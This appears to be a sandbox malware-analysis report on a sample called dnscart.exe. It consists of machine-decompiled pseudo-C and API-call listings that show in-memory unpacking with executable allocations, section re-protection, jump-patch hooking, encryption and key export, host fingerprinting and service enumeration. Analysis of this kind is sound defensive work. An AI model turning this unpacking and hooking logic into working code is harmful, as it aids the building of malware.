Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00212663, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188

C-Code - Quality: 52%

			E00212663(intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v44;
				char _v76;
				intOrPtr _v80;
				DWORD* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr _v172;
				int _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t100;
				intOrPtr _t107;
				intOrPtr _t108;
				int _t113;
				int _t131;
				void* _t135;
				intOrPtr _t157;
				intOrPtr _t159;
				char* _t160;
				intOrPtr _t161;
				void* _t164;
				intOrPtr _t183;
				unsigned int _t186;
				intOrPtr _t192;
				void* _t206;
				intOrPtr _t210;

				_t100 = _a4;
				_v44 = 0;
				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
				_v184 = _t135;
				_v180 = _t100;
				_v80 = _t100;
				_v84 =  &_v44;
				_v88 =  *((intOrPtr*)(_t100 + 0x20));
				_v92 =  *((intOrPtr*)(_t100 + 0x40));
				_v96 = _t100 + 0x3c;
				_v100 = _t135;
				E002123F0(); // executed
				E0021188A(_v100);
				_t210 = _t206 - 8 + 8 - 4 + 4;
				_t164 = _v100;
				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
				_v104 = _t164 + _t192;
				_v108 = _v100 + 0x3c;
				_v112 = 0x18;
				if(_t192 + 0xffffffc0 <= 0xfc0) {
					_t161 = _v104;
					_t134 =  ==  ? _t161 + 0x18 : 0x18;
					_v112 =  ==  ? _t161 + 0x18 : 0x18;
				}
				_v116 = _v112;
				if(_v92 == 0) {
					L4:
					_v140 =  *_v96;
					_v144 = 0;
					do {
						_t107 = _v144;
						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
						_t108 = _t107 + 1;
						_v144 = _t108;
					} while (_t108 != 0x400);
					_t110 =  ==  ? _v100 +  *_v108 : 0;
					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
					_t183 = _v80;
					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
					_v36 =  *((intOrPtr*)(_t183 + 0x70));
					_v32 =  *((intOrPtr*)(_t183 + 0x74));
					_v28 =  *((intOrPtr*)(_t183 + 0x68));
					_v24 =  *((intOrPtr*)(_t183 + 0x64));
					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
					_v184 = 0;
					_v180 = 0x78;
					_v148 = _t113;
					_v152 = 0;
					_v156 = 0x78;
					E0021104C();
					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
					goto __eax;
				} else {
					_t160 =  &_v76;
					_t203 =  ==  ? _v104 : 0;
					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
					_v124 = _t160;
					_v128 = _t160 + 0x10;
					_v132 = _t160;
					_v136 = 0;
					while(1) {
						_t157 = _v120;
						_t186 =  *(_t157 + 0x24);
						_v160 = _v136;
						_v164 = _t186 >> 0x0000001e & 0x00000001;
						_v168 = _t186 >> 0x1f;
						 *_v124 = 1;
						asm("movaps xmm0, [0x2140e0]");
						asm("movups [eax], xmm0");
						_v172 = _t157;
						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
						_t159 = _v160 + 1;
						_v176 = _t131;
						_v120 = _v172 + 0x28;
						_v136 = _t159;
						if(_t159 == _v92) {
							goto L4;
						}
					}
					goto L4;
				}
			}

0x0021266f
0x00212675
0x00212687
0x0021268d
0x00212690
0x00212694
0x00212697
0x0021269a
0x0021269d
0x002126a0
0x002126a3
0x002126a6
0x002126b7
0x002126bc
0x002126ca
0x002126cd
0x002126db
0x002126de
0x002126e1
0x002126e4
0x002126eb
0x002126f9
0x002126fc
0x002126fc
0x00212708
0x0021270b
0x00212749
0x00212750
0x00212756
0x0021275c
0x0021275c
0x0021276e
0x00212771
0x00212779
0x00212779
0x0021279c
0x0021279f
0x002127b1
0x002127bd
0x002127c6
0x002127cc
0x002127d2
0x002127d8
0x002127de
0x002127e1
0x002127e7
0x002127ea
0x002127f2
0x002127fa
0x00212800
0x00212806
0x0021280c
0x00212822
0x00212828
0x0021270d
0x0021270f
0x0021271f
0x00212732
0x00212735
0x00212738
0x0021273b
0x0021273e
0x00212835
0x0021283b
0x0021284c
0x0021284f
0x0021285d
0x0021286e
0x00212877
0x0021287d
0x00212887
0x002128b0
0x002128b6
0x002128be
0x002128cf
0x002128d5
0x002128d8
0x002128de
0x00000000
0x00000000
0x002128e4
0x00000000
0x00212835

APIs

Part of subcall function 002123F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00212428

VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 002127B1
VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 002128B6

Strings

x, xrefs: 002127F2

Memory Dump Source

Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_210000_dnscart.jbxd

Function 00229F42, Relevance: 4.5, APIs: 3, Instructions: 25

C-Code - Quality: 47%

			E00229F42() {
				void* _t6;
				void* _t11;
				void* _t12;
				void* _t18;
				void* _t19;
				void* _t20;

				L00221B10(E00221BE0(_t11, _t12, _t18, _t19), 0x2211f0, _t18, _t19);
				_push(0x22c0d0);
				_push(0x64df2dad);
				_push(0x48);
				_t15 = E00221BE0(_t11, 0x8f7ee672, _t18, _t19);
				L00221B10(_t3, 0x2210d0, _t18, _t19);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t20 = _t6;
				if(_t20 == 0) {
					L3:
					ExitProcess(0);
				}
				goto 0x231d52;
				asm("int3");
				asm("int3");
				asm("int3");
				memset();
				HeapFree(GetProcessHeap(), 0, _t20); // executed
				L002215B0(_t11, _t15); // executed
				goto L3;
			}

0x00229f4e
0x00229f5b
0x00229f60
0x00229f65
0x00229f71
0x00229f73
0x00229f89
0x00229f8f
0x00229f93
0x00229fbb
0x00229fbd
0x00229fbd
0x00229f95
0x00229f9a
0x00229f9b
0x00229f9c
0x00229f9d
0x00229fb0
0x00229fb6
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 00229F82
RtlAllocateHeap.NTDLL(00000000), ref: 00229F89
ExitProcess.KERNEL32 ref: 00229FBD

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229554, Relevance: 4.5, APIs: 3, Instructions: 20

APIs

CreateFileMappingW.KERNELBASE ref: 00229554
CloseHandle.KERNEL32 ref: 0022959C
GetComputerNameW.KERNEL32(?,?), ref: 002295B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00229601
RtlAllocateHeap.NTDLL(00000000), ref: 00229608
_snprintf.NTDLL ref: 00229642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
HeapFree.KERNEL32(00000000), ref: 00229655

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022982E, Relevance: 3.0, APIs: 2, Instructions: 11

APIs

GetProcessHeap.KERNEL32 ref: 0022982E
RtlAllocateHeap.NTDLL(00000000), ref: 00229835
CloseServiceHandle.ADVAPI32 ref: 0022996E

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229305, Relevance: 1.5, APIs: 1, Instructions: 23

C-Code - Quality: 18%

			E00229305(WCHAR* __ecx) {
				void* _t7;
				short* _t8;
				WCHAR* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t13 = __ecx;
				if(GetWindowsDirectoryW(??, ??) == 0) {
					L8:
					E00229370(_t13, _t14, _t15, _t16); // executed
					_t7 = L002290B0(__eflags); // executed
					return _t7;
				} else {
					_t8 = _t17 - 0x208;
					if( *(_t17 - 0x208) != 0) {
						while( *_t8 != 0x5c) {
							_t8 = _t8 + 2;
							_t25 =  *_t8;
							if( *_t8 != 0) {
								continue;
							} else {
								E00229370(_t13, _t14, _t15, _t16);
								return L002290B0(_t25);
							}
							goto L9;
						}
						goto 0x231962;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("scasb");
						asm("int3");
						asm("int3");
						 *(_t8 + 2) = _t13;
						GetVolumeInformationW(_t17 - 0x208, _t13, ??, ??, ??, ??, ??, ??); // executed
					}
					goto L8;
				}
				L9:
			}

0x00229305
0x0022930d
0x0022935b
0x0022935b
0x00229360
0x00229368
0x0022930f
0x00229317
0x0022931d
0x00229320
0x00229326
0x00229329
0x0022932d
0x00000000
0x0022932f
0x0022932f
0x0022933c
0x0022933c
0x00000000
0x0022932d
0x0022933d
0x00229342
0x00229343
0x00229344
0x00229345
0x00229346
0x00229347
0x00229348
0x00229349
0x00229355
0x00229355
0x00000000
0x0022931d
0x00000000

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00229305

Part of subcall function 00229370: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\dnscart.exe,00000104), ref: 0022938C
Part of subcall function 00229370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00229398
Part of subcall function 00229370: CloseServiceHandle.SECHOST(00000000), ref: 002293AA
Part of subcall function 00229370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 002293C6
Part of subcall function 00229370: RtlAllocateHeap.NTDLL(00000000), ref: 002293CD
Part of subcall function 00229370: lstrlen.KERNEL32(?), ref: 002293F4

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229346, Relevance: 1.5, APIs: 1, Instructions: 13

APIs

GetVolumeInformationW.KERNELBASE(?), ref: 00229355

Part of subcall function 00229370: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\dnscart.exe,00000104), ref: 0022938C
Part of subcall function 00229370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00229398
Part of subcall function 00229370: CloseServiceHandle.SECHOST(00000000), ref: 002293AA
Part of subcall function 00229370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 002293C6
Part of subcall function 00229370: RtlAllocateHeap.NTDLL(00000000), ref: 002293CD
Part of subcall function 00229370: lstrlen.KERNEL32(?), ref: 002293F4

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022191E, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

GetFileAttributesW.KERNELBASE ref: 0022191E

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002123F0, Relevance: 1.4, APIs: 1, Instructions: 200

C-Code - Quality: 30%

			E002123F0(intOrPtr _a4, void* _a8) {
				char _v21;
				char _v26;
				char _v31;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void** _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				void** _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _t121;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t167;
				char* _t168;
				void** _t173;
				void* _t178;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr* _t223;
				void** _t232;
				char* _t234;
				void* _t243;
				intOrPtr* _t244;

				_v36 =  &_v21;
				_v40 = _a4;
				_v44 =  &_v31;
				_v48 =  &_v26;
				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t234 =  &_v21;
				_t168 =  &_v26;
				_v52 = _t121;
				_v56 =  &_v31;
				 *_v52 = 0;
				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
				_v64 = 4;
				_v68 = _v40 + _v60;
				_t130 =  ==  ? _v68 : 0;
				_v72 = _v56 + 1;
				_v76 = _t168 + 1;
				_v80 = _t234 + 1;
				_v84 =  &(_v52[1]);
				_v88 = _t168;
				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
				_v96 = _v64;
				_v100 = _t234;
				_v104 = 0xfffffffb - _v52;
				_v108 = 0;
				while(1) {
					_t191 = _v96;
					_v112 = _v108;
					_v116 = _t191;
					_t143 = _t191 + _v52;
					 *_v56 = 0xe8;
					 *_v72 = 0x212194 - _t143;
					_t173 = _v52;
					_v120 = _t143;
					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
					_t197 = _v116;
					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
					_t148 =  *((intOrPtr*)(0x21305c + _v112 * 0xc + 4));
					_v124 = _t148;
					_t178 = _t148 + _v40;
					 *_v88 = 0xe9;
					_v128 = _v120 + 0xfffffffb - _t178;
					_v132 = _t197 + 5;
					 *_v76 = _v128;
					 *_v100 = 0xe9;
					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
					_v136 =  *((intOrPtr*)(0x21305c + _v112 * 0xc + 8));
					_v140 =  *((intOrPtr*)(0x21305c + _v112 * 0xc));
					_v144 = _v52 + _v132;
					_v148 = 0;
					do {
						_t157 = _v148;
						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
						_t158 = _t157 + 1;
						_v148 = _t158;
					} while (_t158 != _v136);
					_t244 = _t243 - 0x14;
					 *_t244 = _v40;
					_v164 = _v92;
					_v160 = _v124;
					_v156 = _v136;
					_v152 = _v144;
					E002121AC();
					_t243 = _t244 + 0x14;
					_t162 = _v116 + _v136;
					_t223 = _v36;
					_t232 = _v84;
					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
					_t164 = _v40;
					_t214 = _v124;
					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
					_t167 = _v116 + 0xe + _v136;
					_t217 = _v112 + 1;
					_v96 = _t167;
					_v108 = _t217;
					if(_t217 != 0x160) {
						continue;
					}
					return _t167;
				}
			}

0x0021241c
0x0021241f
0x00212422
0x00212425
0x00212428
0x00212431
0x00212439
0x0021243c
0x00212442
0x00212448
0x00212454
0x0021245a
0x00212465
0x00212477
0x00212486
0x0021248e
0x0021249b
0x002124a4
0x002124aa
0x002124ad
0x002124b0
0x002124b3
0x002124b6
0x002124b9
0x002124c9
0x002124cc
0x002124e5
0x002124ea
0x002124f0
0x002124f5
0x002124fd
0x00212504
0x00212507
0x0021250d
0x00212516
0x00212519
0x0021252d
0x00212531
0x00212537
0x0021253c
0x00212547
0x0021254d
0x00212553
0x00212567
0x00212579
0x0021258d
0x00212593
0x00212599
0x0021259f
0x002125a5
0x002125a5
0x002125ba
0x002125bd
0x002125c8
0x002125c8
0x002125d0
0x002125d6
0x002125dc
0x002125e3
0x002125ed
0x002125f7
0x002125fb
0x00212600
0x0021260c
0x0021260e
0x00212613
0x00212616
0x0021261c
0x00212625
0x00212628
0x0021262b
0x00212634
0x00212644
0x00212649
0x00212652
0x00212655
0x00212658
0x00000000
0x0021265e
0x002124c8
0x002124c8

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00212428

Memory Dump Source

Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_210000_dnscart.jbxd

Function 00211C91, Relevance: 1.3, APIs: 1, Instructions: 76

APIs

VirtualAlloc.KERNELBASE ref: 00211CD7

Memory Dump Source

Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_210000_dnscart.jbxd

Non-executed Functions

Function 0022259B, Relevance: 12.1, APIs: 8, Instructions: 66encryption

APIs

RtlAllocateHeap.NTDLL ref: 002225A4
CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 002225CA
memcpy.NTDLL(?,?), ref: 002225DE
CryptDecrypt.ADVAPI32(?,00000001,00000000,?,?), ref: 002225FA
CryptVerifySignatureW.ADVAPI32(?,?,00000060,00000000,00000000,?,?), ref: 00222616
CryptDestroyHash.ADVAPI32(?,?,?), ref: 00222629
GetProcessHeap.KERNEL32(00000000), ref: 0022263C
HeapFree.KERNEL32(00000000), ref: 00222643

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00222447, Relevance: 12.1, APIs: 8, Instructions: 58encryption

APIs

GetProcessHeap.KERNEL32(?,?), ref: 00222452
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00222459
CryptDuplicateHash.ADVAPI32(?,?,?,?,?), ref: 0022247E
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00222497
CryptEncrypt.ADVAPI32(?,00000001,?,?,?), ref: 002224B4
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0022252C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0022253A
HeapFree.KERNEL32(00000000), ref: 00222541

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002224C8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39encryption

APIs

CryptExportKey.ADVAPI32(00000001,00000040), ref: 002224E2
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0022252C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0022253A
HeapFree.KERNEL32(00000000), ref: 00222541

Strings

l, xrefs: 002224C8

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00222505, Relevance: 6.0, APIs: 4, Instructions: 29
encryption

C-Code - Quality: 37%

			E00222505(void* __eax, void* __ebx, void* __edi) {
				void* _t18;
				void** _t20;
				void* _t22;

				 *((intOrPtr*)(_t22 - 0x14)) = 0x14;
				 *0x22c068( *((intOrPtr*)(_t22 - 4)), 2, __ebx + 0x60, __eax);
				_t18 =  !=  ? 1 : __edi;
				_t20 =  *(_t22 + 8);
				 *0x22c048( *((intOrPtr*)(_t22 - 4)));
				if(_t18 == 0) {
					HeapFree(GetProcessHeap(), 0,  *_t20);
					 *_t20 = 0;
					_t20[1] = 0;
				}
				return _t18;
			}

0x00222505
0x00222516
0x00222523
0x00222526
0x0022252c
0x00222534
0x00222541
0x00222547
0x0022254d
0x0022254d
0x0022255c

APIs

CryptGetHashParam.ADVAPI32(?,00000002,?), ref: 00222516
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0022252C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0022253A
HeapFree.KERNEL32(00000000), ref: 00222541

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002297F3, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

EnumServicesStatusExW.ADVAPI32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 0022980A
GetLastError.KERNEL32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 00229818
CloseServiceHandle.ADVAPI32 ref: 0022996E

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00222E6A, Relevance: 1.8, Strings: 1, Instructions: 509
Crypto

C-Code - Quality: 50%

			E00222E6A(void* __ebx, void* __fp0) {
				signed int _t1688;
				signed int _t1692;
				void* _t2075;
				signed int _t2086;
				signed int _t2465;
				void* _t2870;

				_t2075 = __ebx;
				 *(_t2870 - 0x1c) = 0xffffffff;
				 *(_t2870 - 4) =  *(_t2870 + 0xc);
				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
				} else {
					 *(_t2870 - 0xf0) = 0xffffffff;
				}
				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
					 *( *(_t2870 + 0x1c)) = 0;
					 *( *(_t2870 + 0x10)) = 0;
					_t1688 = 0xfffffffd;
				} else {
					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
					_t1692 =  *( *(_t2870 + 8) + 0x3c);
					 *(_t2870 - 0x7c) = _t1692;
					_t2086 =  *(_t2870 + 8);
					_t2465 =  *_t2086;
					 *(_t2870 - 0xf8) = _t2465;
					if( *(_t2870 - 0xf8) <= 0x35) {
						_t50 =  *(_t2870 - 0xf8) + 0x2255b0; // 0xcccccc20
						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M00225528))) {
							case 0:
								 *( *(_t2870 + 8) + 0xc) = 0;
								 *( *(_t2870 + 8) + 8) = 0;
								 *(_t2870 - 0x24) = 0;
								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
								 *(_t2870 - 8) =  *(_t2870 - 0x28);
								 *(_t2870 - 0xc) =  *(_t2870 - 8);
								 *( *(_t2870 + 8) + 0x1c) = 1;
								 *( *(_t2870 + 8) + 0x10) = 1;
								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
									goto L48;
								} else {
									goto L9;
								}
								goto L600;
							case 1:
								if(0 != 0) {
									L11:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 1;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L10;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L18:
										L20:
										if(0 != 0) {
											L9:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L20;
											} else {
												L10:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 8) = 0;
													goto L18;
												} else {
													goto L11;
												}
											}
										} else {
											goto L21;
										}
									}
								}
								goto L600;
							case 2:
								if(0 != 0) {
									L23:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 2;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L22;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L30:
										L32:
										if(0 != 0) {
											L21:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L32;
											} else {
												L22:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 0xc) = 0;
													goto L30;
												} else {
													goto L23;
												}
											}
										} else {
											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
												 *(_t2870 - 0x110) = 1;
											} else {
												 *(_t2870 - 0x110) = 0;
											}
											_t1692 =  *(_t2870 - 0x110);
											 *(_t2870 - 0x10) = _t1692;
											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
											if(_t2086 == 0) {
												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
												if(1 > 0x8000) {
													L42:
													 *(_t2870 - 0x10c) = 1;
												} else {
													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
													if( *(_t2870 - 0x88) + 1 < 1) {
														goto L42;
